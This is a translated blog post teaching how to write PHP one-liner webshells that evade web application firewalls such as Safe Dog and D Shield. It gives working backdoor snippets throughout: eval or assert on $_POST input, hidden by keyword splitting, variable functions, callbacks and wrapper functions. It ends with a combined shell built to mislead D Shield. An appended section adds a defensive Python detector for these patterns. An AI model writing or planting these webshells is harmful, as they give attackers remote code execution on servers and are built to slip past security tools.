PHP one-liner webshell: evasion ideas for getting past Safe Dog, Guardian, D Shield and the like!

Source: Internet
Author: User

Originally published at: http://www.legendsec.org/1701.html

I found it written in quite a plain, accessible way.

00x1. Keyword splitting.
For example, assert can be written as 'a'.'ss'.'e'.'r'.'t'.
Summary: Although this method is simple, on its own it does not evade detection very well and needs to be combined with other methods.

00x2. Variable variables, references, variable functions.

Variable variables, for example: $a=$_POST['x']; $b='a'; @eval($$b);
Test results:
Summary: This approach can bypass Safe Dog and other WAFs oh~ but against D Shield's multiple rules it does not work!

References, for example: $a=$_POST['x']; $b=&$a; @eval($b);
Test results:

Summary: This approach behaves much like the previous one.

Variable functions, for example: $a='a'.'ss'.'e'.'r'.'t'; $a($_POST['x']);
Test results:
Summary: This method has no effect against Safe Dog, Guardian, D Shield and the like oh~

00x3. Adding extra code.

Adding extra code, for example:

if (empty($a)) {
    $a = $_POST['x'];
}

@eval($a);
Test results:
Summary: This method suits the more imaginative among you~

00x4. Function substitution.

Replace eval with another function, such as assert.

Summary: This method is suitable when eval is disabled oh~

00x5. Wrapping in a new function.

Define a new function and wrap the code inside it.

function test($a) { // define a function named test, using $a to receive the argument
    eval($a);
}

test($_POST['x']);

Test results:
Summary: This method suits people with some PHP grounding oh, a flashy move~ nothing to fear!

00x6. Function callback.

Call and execute through another function.

For example: array_map('a'.'s'.'se'.'r'.'t', array($_POST['x']));
Test results:
Summary: This method suits people with some PHP grounding oh~ and it definitely gets past the WAF oh~


00x7. Combine the features of the methods above to write a one-liner that gets past the WAF.
<?php
function test($a) { // uses the function wrapping learned above
    if (empty($a)) { // uses the extra-code trick learned above
        $a = "echo 'qq:xxxxxxx';"; // this code is there to disrupt D Shield's judgment
    }
    @eval($a);
}
@test($_POST['x']);
?>


Test Results:
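Added example, not part of the original post: a small Python checker written from the defender's side. It folds the split-string trick from 00x1 back together, then looks for the one shape every technique above shares, request data ($_POST and friends) reaching eval/assert, a callback dispatcher, a variable function or a variable variable. The PHP snippets in SAMPLES are constructed here to mirror the post's patterns; the indicator names are this example's own.

```python
import re

# Constructed samples mirroring the post's patterns (split keyword, variable variable,
# callback, wrapper function) plus one benign form handler that also reads $_POST.
SAMPLES = {
    "split_keyword":     "<?php $f='a'.'ss'.'e'.'r'.'t'; $f($_POST['x']); ?>",
    "variable_variable": "<?php $a=$_POST['x']; $b='a'; @eval($$b); ?>",
    "callback":          "<?php array_map('a'.'s'.'se'.'r'.'t', array($_POST['x'])); ?>",
    "wrapped":           "<?php function t($a){ if(empty($a)){ $a=\"echo 'hi';\"; } @eval($a); } @t($_POST['x']); ?>",
    "benign_form":       "<?php $n=$_POST['name']; echo 'Hello '.htmlspecialchars($n); ?>",
}

CONCAT = re.compile(r"""(['"])([^'"]*)\1\s*\.\s*\1([^'"]*)\1""")  # 'a'.'b' -> 'ab'
SUPERGLOBAL = re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\b")
SINK_CALL = re.compile(r"\b(eval|assert)\s*\(", re.I)             # direct call of a code sink
SINK_LITERAL = re.compile(r"""(['"])(eval|assert)\1""", re.I)      # sink name carried in a string
CALLBACK_CALL = re.compile(r"\b(array_map|call_user_func|call_user_func_array)\s*\(", re.I)
VAR_FUNC = re.compile(r"\$[A-Za-z_]\w*\s*\(")                      # $name(...) variable function
VAR_VAR = re.compile(r"\$\$[A-Za-z_]\w*")                          # $$name variable variable

def normalize(src: str) -> str:
    """Fold 'a'.'ss'.'e'.'r'.'t' back into 'assert'; loops until no adjacent pair is left."""
    prev = None
    while prev != src:
        prev = src
        src = CONCAT.sub(lambda m: m.group(1) + m.group(2) + m.group(3) + m.group(1), src)
    return src

def scan(src: str) -> list:
    """Sorted list of indicator names present in the normalized source."""
    code = normalize(src)
    found = set()
    if SUPERGLOBAL.search(code):
        found.add("superglobal-input")
    found.update("sink-call:" + m.group(1).lower() for m in SINK_CALL.finditer(code))
    found.update("sink-name-literal:" + m.group(2).lower() for m in SINK_LITERAL.finditer(code))
    if CALLBACK_CALL.search(code):
        found.add("callback-dispatcher")
    if VAR_FUNC.search(code):
        found.add("variable-function")
    if VAR_VAR.search(code):
        found.add("variable-variable")
    return sorted(found)

def is_suspicious(src: str) -> bool:
    """Request data plus any sink, dispatcher or dynamic call: the shape all the techniques share."""
    hits = scan(src)
    return "superglobal-input" in hits and len(hits) > 1
```

The benign form handler reads $_POST too but reaches no sink, so it stays clean; splitting the keyword changes nothing once the literals are folded.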

The END
